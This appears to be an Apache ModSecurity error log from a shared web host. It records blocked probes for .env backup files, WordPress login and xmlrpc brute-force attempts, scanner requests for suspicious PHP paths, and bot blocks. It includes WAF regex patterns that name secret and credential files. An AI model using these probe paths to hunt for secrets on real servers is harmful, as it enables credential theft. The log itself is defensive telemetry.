[Tue May 26 12:53:46.439038 2026] [security2:error] [pid 461618:tid 461850] [client 208.84.100.109:30340] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.orig$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1266"] [id "390584"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .orig)"] [severity "CRITICAL"] [hostname "consola.jhonweb.com"] [uri "/.env.orig"] [unique_id "ahVKglyiSlSCHr1fdr2tzwAAAOs"]
[Tue May 26 12:53:46.439037 2026] [security2:error] [pid 461618:tid 461856] [client 208.84.100.109:30288] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\.bak|\\\\.bak\\\\.php)$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1260"] [id "390582"] [rev "2"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that nclude .bak)"] [severity "CRITICAL"] [hostname "consola.jhonweb.com"] [uri "/.env.local.bak"] [unique_id "ahVKglyiSlSCHr1fdr2t0AAAAPE"]
[Tue May 26 12:53:46.440346 2026] [security2:error] [pid 461618:tid 461758] [client 208.84.100.109:30794] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.sw[a-z]$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1275"] [id "390587"] [rev "5"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .sw)"] [severity "CRITICAL"] [hostname "consola.jhonweb.com"] [uri "/.env.production.swp"] [unique_id "ahVKglyiSlSCHr1fdr2t0QAAAI8"]
[Tue May 26 12:53:46.443035 2026] [security2:error] [pid 461618:tid 461840] [client 208.84.100.109:30784] ModSecurity: Access denied with code 406 (phase 2). Pattern match "[a-z0-9]~$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1257"] [id "390581"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data Leakage - attempt to access backup file (disable this rule if you require access to files that end with a tilde)"] [severity "CRITICAL"] [hostname "consola.jhonweb.com"] [uri "/.env.production~"] [unique_id "ahVKglyiSlSCHr1fdr2t1QAAAOE"]
[Tue May 26 12:53:46.443902 2026] [security2:error] [pid 461618:tid 461829] [client 208.84.100.109:30762] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.backup$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1279"] [id "390588"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .backup)"] [severity "CRITICAL"] [hostname "consola.jhonweb.com"] [uri "/.env.production.backup"] [unique_id "ahVKglyiSlSCHr1fdr2t2AAAANY"]
[Tue May 26 12:53:46.444515 2026] [security2:error] [pid 461618:tid 461807] [client 208.84.100.109:30752] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.old$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1263"] [id "390583"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .old)"] [severity "CRITICAL"] [hostname "consola.jhonweb.com"] [uri "/.env.production.old"] [unique_id "ahVKglyiSlSCHr1fdr2t1AAAAMA"]
[Tue May 26 12:53:46.444790 2026] [security2:error] [pid 461618:tid 461779] [client 208.84.100.109:30714] ModSecurity: Access denied with code 406 (phase 2). Pattern match "[a-z0-9]~$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1257"] [id "390581"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data Leakage - attempt to access backup file (disable this rule if you require access to files that end with a tilde)"] [severity "CRITICAL"] [hostname "consola.jhonweb.com"] [uri "/.env.local~"] [unique_id "ahVKglyiSlSCHr1fdr2t1wAAAKQ"]
[Tue May 26 12:53:46.445915 2026] [security2:error] [pid 461618:tid 461781] [client 208.84.100.109:30732] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.orig$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1266"] [id "390584"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .orig)"] [severity "CRITICAL"] [hostname "consola.jhonweb.com"] [uri "/.env.local.orig"] [unique_id "ahVKglyiSlSCHr1fdr2t1gAAAKY"]
[Tue May 26 12:53:46.445927 2026] [security2:error] [pid 461618:tid 461809] [client 208.84.100.109:30696] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.old$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1263"] [id "390583"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .old)"] [severity "CRITICAL"] [hostname "consola.jhonweb.com"] [uri "/.env.local.old"] [unique_id "ahVKglyiSlSCHr1fdr2t2QAAAMI"]
[Tue May 26 12:53:46.446067 2026] [security2:error] [pid 461618:tid 461803] [client 208.84.100.109:30796] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.orig$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1266"] [id "390584"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .orig)"] [severity "CRITICAL"] [hostname "consola.jhonweb.com"] [uri "/.env.production.orig"] [unique_id "ahVKglyiSlSCHr1fdr2t0wAAALw"]
[Tue May 26 12:53:46.446112 2026] [security2:error] [pid 461618:tid 461831] [client 208.84.100.109:30744] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\.bak|\\\\.bak\\\\.php)$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1260"] [id "390582"] [rev "2"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that nclude .bak)"] [severity "CRITICAL"] [hostname "consola.jhonweb.com"] [uri "/.env.production.bak"] [unique_id "ahVKglyiSlSCHr1fdr2t3wAAANg"]
[Tue May 26 12:53:46.446215 2026] [security2:error] [pid 461618:tid 461823] [client 208.84.100.109:30718] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.sw[a-z]$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1275"] [id "390587"] [rev "5"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .sw)"] [severity "CRITICAL"] [hostname "consola.jhonweb.com"] [uri "/.env.local.swp"] [unique_id "ahVKglyiSlSCHr1fdr2t4AAAANA"]
[Tue May 26 12:53:46.447273 2026] [security2:error] [pid 461618:tid 461853] [client 208.84.100.109:30706] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.backup$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1279"] [id "390588"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .backup)"] [severity "CRITICAL"] [hostname "consola.jhonweb.com"] [uri "/.env.local.backup"] [unique_id "ahVKglyiSlSCHr1fdr2t3AAAAO4"]
[Tue May 26 12:53:46.449270 2026] [security2:error] [pid 461618:tid 461763] [client 208.84.100.109:30742] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.copy$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1269"] [id "390586"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .copy)"] [severity "CRITICAL"] [hostname "consola.jhonweb.com"] [uri "/.env.local.copy"] [unique_id "ahVKglyiSlSCHr1fdr2t2wAAAJQ"]
[Tue May 26 12:53:46.450474 2026] [security2:error] [pid 461618:tid 461752] [client 208.84.100.109:30360] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.copy$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1269"] [id "390586"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .copy)"] [severity "CRITICAL"] [hostname "consola.jhonweb.com"] [uri "/.env.copy"] [unique_id "ahVKglyiSlSCHr1fdr2t0gAAAIk"]
[Tue May 26 12:53:46.565218 2026] [security2:error] [pid 461618:tid 461811] [client 173.252.79.10:59536] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "politica-global.com"] [uri "/index.php"] [unique_id "ahVKglyiSlSCHr1fdr2tzQAAxEU"]
[Tue May 26 12:53:47.089061 2026] [security2:error] [pid 461618:tid 461863] [client 173.252.79.1:52654] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "politica-global.com"] [uri "/index.php"] [unique_id "ahVKglyiSlSCHr1fdr2uDwAA-Gc"]
[Tue May 26 12:53:47.757345 2026] [security2:error] [pid 461618:tid 461869] [client 173.252.79.11:54970] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "politica-global.com"] [uri "/index.php"] [unique_id "ahVKg1yiSlSCHr1fdr2uIQAA1g0"]
[Tue May 26 12:53:47.869769 2026] [security2:error] [pid 461618:tid 461831] [client 57.141.2.7:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVKg1yiSlSCHr1fdr2uIAAAANg"]
[Tue May 26 12:53:48.040498 2026] [security2:error] [pid 461618:tid 461759] [client 173.252.79.11:54978] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "politica-global.com"] [uri "/index.php"] [unique_id "ahVKg1yiSlSCHr1fdr2uMQAAkCg"]
[Tue May 26 12:53:48.442261 2026] [security2:error] [pid 461618:tid 461813] [client 173.252.79.9:47088] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "politica-global.com"] [uri "/index.php"] [unique_id "ahVKhFyiSlSCHr1fdr2uSQAAxnY"]
[Tue May 26 12:53:48.848663 2026] [security2:error] [pid 461618:tid 461785] [client 173.252.79.3:44900] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "politica-global.com"] [uri "/index.php"] [unique_id "ahVKhFyiSlSCHr1fdr2uWwAAqiw"]
[Tue May 26 12:53:50.381132 2026] [security2:error] [pid 461618:tid 461861] [client 157.20.138.61:58862] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 61.138.20.157.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "preetishah.com"] [uri "/xmlrpc.php"] [unique_id "ahVKhlyiSlSCHr1fdr2uqgAAAPY"]
[Tue May 26 12:53:50.381326 2026] [security2:error] [pid 461618:tid 461861] [client 157.20.138.61:58862] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "preetishah.com"] [uri "/xmlrpc.php"] [unique_id "ahVKhlyiSlSCHr1fdr2uqgAAAPY"]
[Tue May 26 12:53:50.686392 2026] [security2:error] [pid 461618:tid 461824] [client 85.121.55.185:48274] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "moes-art.com"] [uri "/index.php"] [unique_id "ahVKhlyiSlSCHr1fdr2urgAAANE"]
[Tue May 26 12:53:50.752809 2026] [security2:error] [pid 461618:tid 461845] [client 57.141.2.63:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVKhlyiSlSCHr1fdr2upgAAAOY"]
[Tue May 26 12:53:50.764037 2026] [security2:error] [pid 461618:tid 461765] [client 74.249.173.207:4261] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 207.173.249.74.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "mail.deccandigest.com.md-74.webhostbox.net"] [uri "/an.php"] [unique_id "ahVKhlyiSlSCHr1fdr2utgAAAJY"]
[Tue May 26 12:53:51.312138 2026] [autoindex:error] [pid 461618:tid 461771] [client 43.250.164.247:0] AH01276: Cannot serve directory /home2/ucdccoin/public_html/upload/slider/: No matching DirectoryIndex (index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.php,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: https://www.ucdc.co.in/
[Tue May 26 12:53:51.338906 2026] [security2:error] [pid 461618:tid 461781] [client 43.250.164.247:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "ucdc.co.in"] [uri "/index.php"] [unique_id "ahVKh1yiSlSCHr1fdr2u1gAAAKY"], referer: https://www.ucdc.co.in/
[Tue May 26 12:53:51.352480 2026] [autoindex:error] [pid 461618:tid 461764] [client 15.204.183.221:0] AH01276: Cannot serve directory /home2/glorolle/public_html/juniorwoodies.com/: No matching DirectoryIndex (index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.php,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: http://juniorwoodies.com/
[Tue May 26 12:53:52.122990 2026] [security2:error] [pid 461618:tid 461800] [client 74.249.173.207:4268] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 207.173.249.74.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "mail.deccandigest.com.md-74.webhostbox.net"] [uri "/index/function.php"] [unique_id "ahVKiFyiSlSCHr1fdr2vAAAAALk"]
[Tue May 26 12:53:52.156757 2026] [security2:error] [pid 461618:tid 461780] [client 195.178.110.34:40954] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "cpanel.canopykaapi.com"] [uri "/___proxy_subdomain_cpanel/env/.env"] [unique_id "ahVKiFyiSlSCHr1fdr2vAgAAAKU"]
[Tue May 26 12:53:52.776796 2026] [security2:error] [pid 461618:tid 461866] [client 85.208.96.208:60414] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "theafterglow-centre.com"] [uri "/events/tag/february-7th/list/"] [unique_id "ahVKiFyiSlSCHr1fdr2vGAAAAPs"]
[Tue May 26 12:53:52.776956 2026] [security2:error] [pid 461618:tid 461866] [client 85.208.96.208:60414] ModSecurity: Warning. Matched phrase "Semrush" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "406"] [hostname "theafterglow-centre.com"] [uri "/events/tag/february-7th/list/"] [unique_id "ahVKiFyiSlSCHr1fdr2vGAAAAPs"]
[Tue May 26 12:53:52.917419 2026] [proxy:error] [pid 461618:tid 461758] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 12:53:52.917481 2026] [proxy_http:error] [pid 461618:tid 461758] [client 185.169.4.152:64965] AH01114: HTTP: failed to make connection to backend: 127.0.0.1, referer: binance.com
[Tue May 26 12:53:52.918081 2026] [proxy:error] [pid 461618:tid 461758] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 12:53:52.918152 2026] [proxy_http:error] [pid 461618:tid 461758] [client 185.169.4.152:64965] AH01114: HTTP: failed to make connection to backend: 127.0.0.1, referer: binance.com
[Tue May 26 12:53:53.184119 2026] [security2:error] [pid 461618:tid 461768] [client 123.16.146.60:52052] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 60.146.16.123.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.cagmedya.com"] [uri "/wp-login.php"] [unique_id "ahVKiFyiSlSCHr1fdr2vHAAAAJk"], referer: https://www.cagmedya.com/
[Tue May 26 12:53:53.504175 2026] [security2:error] [pid 461618:tid 461811] [client 57.141.2.50:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVKiVyiSlSCHr1fdr2vIAAAAMQ"]
[Tue May 26 12:53:53.888006 2026] [security2:error] [pid 461618:tid 461765] [client 74.249.173.207:4405] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 207.173.249.74.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "mail.deccandigest.com.md-74.webhostbox.net"] [uri "/ws.php"] [unique_id "ahVKiVyiSlSCHr1fdr2vOQAAAJY"]
[Tue May 26 12:53:56.986063 2026] [security2:error] [pid 461618:tid 461721] [remote 103.95.119.103:34088] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 103.119.95.103.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "hassina-foundation.com"] [uri "/wp-login.php"] [unique_id "ahVKjFyiSlSCHr1fdr2vhAAA72Y"]
[Tue May 26 12:53:57.306530 2026] [security2:error] [pid 461618:tid 461818] [client 57.141.2.49:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVKjFyiSlSCHr1fdr2vhwAAAMs"]
[Tue May 26 12:53:58.908376 2026] [security2:error] [pid 461618:tid 461871] [client 57.141.2.30:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVKjlyiSlSCHr1fdr2vwAAAAQA"]
[Tue May 26 12:54:01.208076 2026] [security2:error] [pid 461618:tid 461831] [client 157.20.138.61:59219] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 61.138.20.157.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "preetishah.com"] [uri "/xmlrpc.php"] [unique_id "ahVKkVyiSlSCHr1fdr2wBAAAANg"]
[Tue May 26 12:54:01.208250 2026] [security2:error] [pid 461618:tid 461831] [client 157.20.138.61:59219] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "preetishah.com"] [uri "/xmlrpc.php"] [unique_id "ahVKkVyiSlSCHr1fdr2wBAAAANg"]
[Tue May 26 12:54:01.447480 2026] [core:crit] [pid 461618:tid 461819] (13)Permission denied: [client 40.77.167.50:0] AH00529: /home1/taote1zo/public_html/nigeriahomebuilders.com/.htaccess pcfg_openfile: unable to check htaccess file, ensure it is readable and that '/home1/taote1zo/public_html/nigeriahomebuilders.com/' is executable
[Tue May 26 12:54:02.399062 2026] [security2:error] [pid 461618:tid 461767] [client 195.178.110.34:36982] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "cpanel.canopykaapi.com"] [uri "/___proxy_subdomain_cpanel/env/.env"] [unique_id "ahVKklyiSlSCHr1fdr2wMwAAAJg"]
[Tue May 26 12:54:02.448375 2026] [security2:error] [pid 461618:tid 461760] [client 85.121.55.185:46662] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "moes-art.com"] [uri "/index.php"] [unique_id "ahVKklyiSlSCHr1fdr2wKwAAAJE"]
[Tue May 26 12:54:02.656439 2026] [security2:error] [pid 461618:tid 461861] [client 57.141.2.20:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVKklyiSlSCHr1fdr2wJwAAAPY"]
[Tue May 26 12:54:03.249588 2026] [security2:error] [pid 461618:tid 461838] [client 74.249.173.207:4400] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 207.173.249.74.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "mail.deccandigest.com.md-74.webhostbox.net"] [uri "/404.php"] [unique_id "ahVKk1yiSlSCHr1fdr2wQwAAAN8"]
[Tue May 26 12:54:04.938836 2026] [security2:error] [pid 461618:tid 461752] [client 74.249.173.207:4397] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 207.173.249.74.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "mail.deccandigest.com.md-74.webhostbox.net"] [uri "/wp-admin/user/index.php"] [unique_id "ahVKlFyiSlSCHr1fdr2wcwAAAIk"]
[Tue May 26 12:54:05.066267 2026] [security2:error] [pid 461618:tid 461789] [client 57.141.2.12:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVKlFyiSlSCHr1fdr2wbAAAAK4"]
[Tue May 26 12:54:05.842491 2026] [security2:error] [pid 461618:tid 461849] [client 74.249.173.207:4396] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 207.173.249.74.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "mail.deccandigest.com.md-74.webhostbox.net"] [uri "/wp-conf.php"] [unique_id "ahVKlVyiSlSCHr1fdr2wkgAAAOo"]
[Tue May 26 12:54:06.167815 2026] [core:crit] [pid 461618:tid 461799] (13)Permission denied: [client 40.77.167.63:0] AH00529: /home1/taote1zo/public_html/nigeriahomebuilders.com/.htaccess pcfg_openfile: unable to check htaccess file, ensure it is readable and that '/home1/taote1zo/public_html/nigeriahomebuilders.com/' is executable
[Tue May 26 12:54:06.521206 2026] [core:crit] [pid 461618:tid 461781] (13)Permission denied: [client 157.55.39.195:0] AH00529: /home1/taote1zo/public_html/nigeriahomebuilders.com/.htaccess pcfg_openfile: unable to check htaccess file, ensure it is readable and that '/home1/taote1zo/public_html/nigeriahomebuilders.com/' is executable
[Tue May 26 12:54:07.376185 2026] [security2:error] [pid 461618:tid 461784] [client 57.141.2.59:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVKllyiSlSCHr1fdr2w7AAAAKk"]
[Tue May 26 12:54:09.210574 2026] [security2:error] [pid 461618:tid 461828] [client 74.249.173.207:4414] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 207.173.249.74.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "mail.deccandigest.com.md-74.webhostbox.net"] [uri "/wp-login.php"] [unique_id "ahVKmFyiSlSCHr1fdr2xZwAAANU"]
[Tue May 26 12:54:10.943920 2026] [security2:error] [pid 461618:tid 461864] [client 57.141.2.53:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVKmlyiSlSCHr1fdr2xswAAAPk"]
[Tue May 26 12:54:11.338916 2026] [security2:error] [pid 461618:tid 461830] [client 195.178.110.34:50258] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "cpanel.canopykaapi.com"] [uri "/___proxy_subdomain_cpanel/api/.env"] [unique_id "ahVKm1yiSlSCHr1fdr2xzQAAANc"]
[Tue May 26 12:54:12.473977 2026] [security2:error] [pid 461618:tid 461779] [client 157.20.138.61:59585] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 61.138.20.157.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "preetishah.com"] [uri "/xmlrpc.php"] [unique_id "ahVKnFyiSlSCHr1fdr2x7wAAAKQ"]
